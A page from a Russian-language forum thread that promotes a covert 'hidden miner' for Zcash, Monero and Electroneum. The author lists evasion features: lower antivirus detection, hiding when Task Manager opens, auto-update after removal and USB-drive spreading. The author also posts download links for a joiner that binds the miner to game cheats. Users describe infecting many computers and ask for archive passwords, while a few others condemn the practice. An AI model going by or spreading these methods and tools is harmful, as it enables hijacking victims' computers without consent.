Pages:
Author

Topic: Скрытый майнер 2018. - page 4. (Read 8670 times)

newbie
Activity: 2
Merit: 0
April 21, 2018, 06:58:24 PM
Здравствуйте, подскажите пожалуйста, если установлен майнер, вроде как, февральской версии, то он автообновляемый или нужно удалить и поставить новую версию? И если не поставить новую версию, старая не будет работать? А то, почему-то последнюю неделю статистика не изменяется.

Также подскажите пожалуйста, в пуле, после ввода кошелька, отображается общая статистика или по одному пользователю?
newbie
Activity: 7
April 19, 2018, 04:54:28 PM
Имеются установки под данное оборудование..
Кто понял о чем я и кому это нужно, добро пожаловать в лс
newbie
Activity: 56
April 18, 2018, 03:17:20 AM
У меня такой вопрос... у меня много заражённых компов, скидывал майнер через флешку. но на пуле пишет что активных один всегда, почему такая фигня?
По всей видимости потому что на всех компьютерах прописан один воркер и хеши всех подключеныйх компьютеров суммируются. Для того, что бы видеть все компьютеры, нужно ка каждом прописывать индивидуальный воркер.
Не знаю как делается в вирусном майнинге, но в честном так.
В таком случае есть смысле продолжать заражать компы на этой локалке?
Свой зарази. Неужели люди такие нищие или жадные, что готовы идти на такие пакости ради копеек, которые им упадут от подобного зароботка. На баунти лучше эти силы потрать, больше заработаешь.

Монеро изменил алгоритм, кто скажет - этот майнер еще работает на Монеро ?

Да , написано же , что майнер поддерживает хардфорк , все майнеры успешно работают.

Какой именно пароль от всех архивов?
сам не пойму какой

Написано же , находится в пунктах темы : Вшивание в майнер ваших кошельков. и Запуск майнера с txt рядом. Пароль состоит из двух частей.

Всем привет, у меня вот тут проблема, можете пожалуйста помочь. Дело в том, что я сделал всё по инструкции, создал 1.txt с ZCash кошельком и Monero, поместил рядом с майнером, запустил его и txt пропал. Майнер работает первые 10 минут и выключается, на пуле не пишет h/s. Что делать?

Напиши мне в телеграмм @DarkMinerZ  , будем разбираться , что ты не так сделал .

Всем шалом . Вышла новая версия майнера 0.8.0.0 - 0.8.0.1 . Основные нововведения :
1⃣ Упрощение джойнера , не нужно создавать txt , всё можно писать в джойнере.
2⃣ Теперь будет две версии джойнера , с распространением майнера на флешки и без , на данный момент доступен джойнер без распространения .
3⃣ Смена иконок , работает пока не стабильно , ломает созданный exe , но можете попробовать , можно написать мне , сделаю поддержку вашей иконки и скину .
4⃣ Исправлены мелкие баги, текущие проблемы некоторых пользователей.
5⃣ Снижен детект .
6⃣ Повышена скрытность .

ИНСТРУКЦИЯ по джойнеру : пишем свои кошельки , добавляем exe версию майнера hight или low , нажимаем склеить и всё , теперь майнер с вашими кошельками , по желанию можно склеить с другими файлами . СТАБ клеить с майнером не нужно !
Джойнер https://www.sendspace.com/file/r5p0nq
Майнер заниженный https://www.sendspace.com/file/l6dgzl
Майнер завышенный https://www.sendspace.com/file/y65jum

Скачивая , вы соглашаетесь , что полную ответственность несёте исключительно вы . Программы созданы в ознакомительных целях.
newbie
Activity: 1
April 14, 2018, 05:20:28 PM
Майнил с купленного за 6к скрытого майнера от однго кодера, ветки были у него почти на всех форумах "околохацкерских", осталось 3 копии, если кому интересно, могу дать, он мне не особо пригодился Cry
Не осилил проблему с тем, что сбил настройки демона в гуи кошельке...

Пожалуйста можешь скинуть мне, никак не могу найти адекватный майнер, или если никак то можешь помочь с этим"Kakoy parol ot arhiva?" Cry Cry Cry
newbie
April 14, 2018, 09:44:15 AM
Всем привет, у меня вот тут проблема, можете пожалуйста помочь. Дело в том, что я сделал всё по инструкции, создал 1.txt с ZCash кошельком и Monero, поместил рядом с майнером, запустил его и txt пропал. Майнер работает первые 10 минут и выключается, на пуле не пишет h/s. Что делать?
newbie
April 12, 2018, 07:52:25 AM
Какой пароль от архивов?
newbie
April 10, 2018, 12:31:45 PM
братцы, дайте пароль! все прочел, что то я не так понимаю, похоже. Три дня не могу проверить комп, на предмет скрытого майнера.
full member
Activity: 518
Merit: 106
April 07, 2018, 10:03:29 AM
Теперь жертвы жадных и мелочных злодеев смогут вздохнуть свободно, наслаждаясь нормальной работой компьютера. Ну до того момента, пока не попросят своего подлого соседа поднастроить Windows или установить какую-то программу.
newbie
April 07, 2018, 07:50:16 AM
сам не пойму какой
newbie
April 06, 2018, 06:11:52 PM
У меня такой вопрос... у меня много заражённых компов, скидывал майнер через флешку. но на пуле пишет что активных один всегда, почему такая фигня?
По всей видимости потому что на всех компьютерах прописан один воркер и хеши всех подключеныйх компьютеров суммируются. Для того, что бы видеть все компьютеры, нужно ка каждом прописывать индивидуальный воркер.
Свой зарази. Неужели люди такие нищие или жадные, что готовы идти на такие пакости ради копеек, которые им упадут от подобного зароботка. На баунти лучше эти силы потрать, больше заработаешь.

sr. member
Activity: 840
Merit: 276
April 02, 2018, 10:56:55 AM
newbie
Activity: 3
April 02, 2018, 10:36:40 AM
hero member
Activity: 896
Merit: 507
April 02, 2018, 03:51:17 AM
newbie
Activity: 153
April 01, 2018, 07:05:12 PM
Примерно хотя бы известно когда вернется заражение флешки?
newbie
Activity: 153
March 28, 2018, 06:54:38 PM
Не понимаю в чем смысл занематся таким видом майнинга, ведь деньги которые можно получить просто смешны.
Если хочется майнить то достаточно просто купить ферму.
Во сколько обойдется ферма для начинающего майнера и за сколько она отобьется?
member
Activity: 294
Merit: 10
March 28, 2018, 11:19:26 AM
Не понимаю в чем смысл занематся таким видом майнинга, ведь деньги которые можно получить просто смешны.
Если хочется майнить то достаточно просто купить ферму.
newbie
March 28, 2018, 03:17:32 AM
Собери пжл заниженную версию exe. zcash t1K84VtT2KxvLtxw73JjSYYzTEy5bhgrziB
Моя почта [email protected]
Теперь можно самим вшить свои кошельки с помощью джойнера , добавить свои файлы , склеить с читом .

Вшей плиз  кошелек : t1YVjCkqrFckid7yJ7hb94RE3Td9a6LSwcm  в последнюю версию .
И скинь плиз сюда : [email protected]
Теперь можно самим вшить свои кошельки с помощью джойнера , добавить свои файлы , склеить с читом . Если используешь только зикеш на первой строке , то будет работать только видеокарта nvidia , если на второй строке указать электрониум или монеро , то будет работать AMD , CPU , а если заполнить кошельками первую и вторую строку , то будет работать всё возможное оборудование.

Что то у меня по всем ссылкам фаелклауд говорит что файл не найден, скинте плиз в личку заниженую версию майнера и утилиту для удаления, заранее спасибо.

Ссылки на майнер обновлены, можно спокойно скачивать , пароль на архив читайте в пунктах темы.

Интересное предложение, 10% - справедливое вознаграждение создателю скрипта. Есть ли возможность добавить свой кошелёк, прошить в скрипт, чтобы к примеру поделиться с другом у которого достаточно мощный ПК? Конечно уведомив его, а в случае перенагрева отключить скрипт.

Есть возможность теперь вшивать самим свои кошельки в майнер , склеивать с читами и своими файлами при помощи джойнера .

Не думаю, что проблема в майнере, но все таки. Пробовал с 2 компов, 2 версии майнера, после перезагрузки перестает работать. Из мониторинга вижу, что пропадает образ X.exe. Антивирус отсутствует, если только defender. Ваш ламер
upd: версия 0.3.0 работает без проблем

В новой версии проводились тесты разными людьми , всего было задействовано 6 человек для тестов , у всех отработало нормально и стабильно , после тестов была выпущена новая версия ,ссылки в теме.

Так нормально работает или развод? Из коментов двоякое впечатление

А вы как думаете ? В телеграмме количество человек более 1000 , это уже что-то значит , в чате общается более 500 человек , можете зайти и пообщаться .
full member
Activity: 420
Merit: 100
March 27, 2018, 12:34:22 PM
Были ли какие-нибудь прецеденты, что владельцев бот-сетей отлавливали и давали им по голове? У меня только один вопрос - насколько это легально?
newbie
March 26, 2018, 12:31:19 PM
Нововведения :
   1) Автообновление майнера , если даже манер удалил АВ или пользователь , с выходом новой версии майнер обновится , воркер опять будет ваш .
   2) Поддерживаюся теперь 32 битные и 64 битные системы.
   3) Введена поддержка монеро , т.е. майнер теперь работает с Zcash , Электрониум и  Монеро .
   4) Майнер уже поддерживает будующий хардфорк монеро.
   5) Увеличилась прибыль майнера на ~20%.
   6) Майнер уходит в спячку при открытии Диспетчера , Pricess Hacker  , Мониторинге ресурсов.
   7) Теперь можно вшивать самим кошельки в майнер при помощи джойнера , склеивать с рабочими программами, на выходе вы получите один exe.
   Cool Можно запускать и по старинке , c 1.txt рядом.
FAN
legendary
Activity: 2688
Merit: 1020
March 20, 2018, 05:01:24 PM
за такой майнинг стрелять на месте
изза таких редисок всех майнеров посадят, а ты не воруй

неужели сюда прибились бомжи у которых на купить комп и майнить средств нету?
а взять лопату и копать от забора до обеда не судьба?
Pages:
Jump to: